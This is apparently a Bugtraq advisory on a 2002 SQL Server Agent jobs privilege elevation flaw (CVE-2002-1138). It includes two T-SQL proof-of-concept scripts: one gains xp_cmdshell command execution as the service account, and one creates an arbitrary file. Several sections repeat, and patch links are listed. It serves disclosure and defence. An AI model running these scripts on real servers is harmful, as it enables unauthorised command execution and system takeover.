Microsoft SQL Agent Jobs Privilege Elevation Vulnerability
BID:5483
Info
Microsoft SQL Agent Jobs Privilege Elevation Vulnerability
| Bugtraq ID: | 5483 |
| Class: | Design Error |
| CVE: |
CVE-2002-1138 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 15 2002 12:00AM |
| Updated: | Jul 11 2009 03:56PM |
| Credit: | Reported by "David Litchfield" <[email protected]>. |
| Vulnerable: |
Microsoft SQL Server 2000 SP2 Microsoft SQL Server 2000 SP1 Microsoft SQL Server 2000 Microsoft SQL Server 7.0 SP4 Microsoft SQL Server 7.0 SP3 Microsoft SQL Server 7.0 SP2 Microsoft SQL Server 7.0 SP1 Microsoft SQL Server 7.0 Microsoft Data Engine 2000 Microsoft Data Engine (MSDE) 1.0 |
| Not Vulnerable: | |
Discussion
Microsoft SQL Agent Jobs Privilege Elevation Vulnerability
Microsoft SQL Server 2000 uses an Agent which is responsible for restarting the SQL Server service, replication, and running scheduled jobs.
Some of the jobs that the Agent executes have weak permissions, which could allow a user with low permissions to perform actions on the database in the context of the SQL Server Service Account when used in conjunction with the Microsoft SQL Server Extended Stored Procedure Privilege Elevation Vulnerability (BID 5481).
Microsoft SQL Server 2000 uses an Agent which is responsible for restarting the SQL Server service, replication, and running scheduled jobs.
Some of the jobs that the Agent executes have weak permissions, which could allow a user with low permissions to perform actions on the database in the context of the SQL Server Service Account when used in conjunction with the Microsoft SQL Server Extended Stored Procedure Privilege Elevation Vulnerability (BID 5481).
Exploit / POC
Microsoft SQL Agent Jobs Privilege Elevation Vulnerability
The following proof of concept code supplied by David Litchfield <[email protected]> will give a user access to xp_cmdshell:
-- GetSystemOnSQL
-- For this to work the SQL Agent should be running.
-- Further, you'll need to change SERVER_NAME in
-- sp_add_jobserver to the SQL Server of your choice
--
-- David Litchfield
-- ([email protected])
-- 18th July 2002
USE msdb
EXEC sp_add_job @job_name = 'GetSystemOnSQL',
@enabled = 1,
@description = 'This will give a low privileged user access to
xp_cmdshell',
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
@step_name = 'Exec my sql',
@subsystem = 'TSQL',
@command = 'exec master..xp_execresultset N''select ''''exec
master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master'''
EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
@server_name = 'SERVER_NAME'
EXEC sp_start_job @job_name = 'GetSystemOnSQL'
The following proof of concept code supplied by David Litchfield <[email protected]> will create a file called c:\sqlafc123.txt:
-- ArbitraryFileCreate
-- For this to work the SQL Agent should be running.
-- Further, you'll need to change SERVER_NAME in
-- sp_add_jobserver to the SQL Server of your choice
--
-- David Litchfield
-- ([email protected])
-- 19th August 2002
USE msdb
EXEC sp_add_job @job_name = 'ArbitraryFileCreate',
@enabled = 1,
@description = 'This will create a file called c:\sqlafc123.txt',
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'ArbitraryFileCreate',
@step_name = 'SQLAFC',
@subsystem = 'TSQL',
@command = 'select ''hello, this file was created by the SQL Agent.''',
@output_file_name = 'c:\sqlafc123.txt'
EXEC sp_add_jobserver @job_name = 'ArbitraryFileCreate',
@server_name = 'SERVER_NAME'
EXEC sp_start_job @job_name = 'ArbitraryFileCreate'
The following proof of concept code supplied by David Litchfield <[email protected]> will give a user access to xp_cmdshell:
-- GetSystemOnSQL
-- For this to work the SQL Agent should be running.
-- Further, you'll need to change SERVER_NAME in
-- sp_add_jobserver to the SQL Server of your choice
--
-- David Litchfield
-- ([email protected])
-- 18th July 2002
USE msdb
EXEC sp_add_job @job_name = 'GetSystemOnSQL',
@enabled = 1,
@description = 'This will give a low privileged user access to
xp_cmdshell',
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
@step_name = 'Exec my sql',
@subsystem = 'TSQL',
@command = 'exec master..xp_execresultset N''select ''''exec
master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master'''
EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
@server_name = 'SERVER_NAME'
EXEC sp_start_job @job_name = 'GetSystemOnSQL'
The following proof of concept code supplied by David Litchfield <[email protected]> will create a file called c:\sqlafc123.txt:
-- ArbitraryFileCreate
-- For this to work the SQL Agent should be running.
-- Further, you'll need to change SERVER_NAME in
-- sp_add_jobserver to the SQL Server of your choice
--
-- David Litchfield
-- ([email protected])
-- 19th August 2002
USE msdb
EXEC sp_add_job @job_name = 'ArbitraryFileCreate',
@enabled = 1,
@description = 'This will create a file called c:\sqlafc123.txt',
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'ArbitraryFileCreate',
@step_name = 'SQLAFC',
@subsystem = 'TSQL',
@command = 'select ''hello, this file was created by the SQL Agent.''',
@output_file_name = 'c:\sqlafc123.txt'
EXEC sp_add_jobserver @job_name = 'ArbitraryFileCreate',
@server_name = 'SERVER_NAME'
EXEC sp_start_job @job_name = 'ArbitraryFileCreate'
Solution / Fix
Microsoft SQL Agent Jobs Privilege Elevation Vulnerability
Solution:
Microsoft has revised Security Bulletin MS02-056. Microsoft recommends that users of SQL 2000 and MSDE 2000 apply the patch from MS02-061 which contains additional security fixes:
Microsoft SQL Server 2000
Microsoft SQL Server 7.0 SP1
Microsoft SQL Server 7.0 SP3
Microsoft SQL Server 7.0 SP4
Microsoft SQL Server 2000 SP1
Microsoft SQL Server 7.0 SP2
Microsoft SQL Server 2000 SP2
Microsoft SQL Server 7.0
Solution:
Microsoft has revised Security Bulletin MS02-056. Microsoft recommends that users of SQL 2000 and MSDE 2000 apply the patch from MS02-061 which contains additional security fixes:
Microsoft SQL Server 2000
-
Microsoft sql2ksp3
http://www.microsoft.com/sql/downloads/2000/sp3.asp?SD=GN&LN=en-us&gss nb=1
Microsoft SQL Server 7.0 SP1
-
Microsoft Q327068
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q327068&sd=tec h
Microsoft SQL Server 7.0 SP3
-
Microsoft Q327068
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q327068&sd=tec h
Microsoft SQL Server 7.0 SP4
-
Microsoft Q327068
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q327068&sd=tec h
Microsoft SQL Server 2000 SP1
-
Microsoft sql2ksp3
http://www.microsoft.com/sql/downloads/2000/sp3.asp?SD=GN&LN=en-us&gss nb=1
Microsoft SQL Server 7.0 SP2
-
Microsoft Q327068
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q327068&sd=tec h
Microsoft SQL Server 2000 SP2
-
Microsoft Q316333
http://support.microsoft.com/default.aspx?scid=http://download.microso ft.com/download/SQLSVR2000/Update/8.00.0578/W982KMeXP/EN-US/8.00.0578. exe -
Microsoft Q316333
http://support.microsoft.com/default.aspx?scid=http://download.microso ft.com/download/SQLSVR2000/Update/8.00.0650/W98NT42KMeXP/EN-US/8.00.06 50_enu.exe -
Microsoft Q316333
SQL Server Service Pack 2 must be installed prior to installing this patch.
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q316333 -
Microsoft Q316333
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q316333& -
Microsoft Q316333
For Microsoft SQL Server 2000 SP2.
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q316333& -
Microsoft Q316333
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q316333&sd=tec h -
Microsoft sql2ksp3
http://www.microsoft.com/sql/downloads/2000/sp3.asp?SD=GN&LN=en-us&gss nb=1
Microsoft SQL Server 7.0
-
Microsoft Q327068
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q327068&sd=tec h
References
Microsoft SQL Agent Jobs Privilege Elevation Vulnerability
References:
References:
- Microsoft Security Bulletin MS02-056 (Microsoft)
- Microsoft Security Bulletin MS02-061 (Microsoft)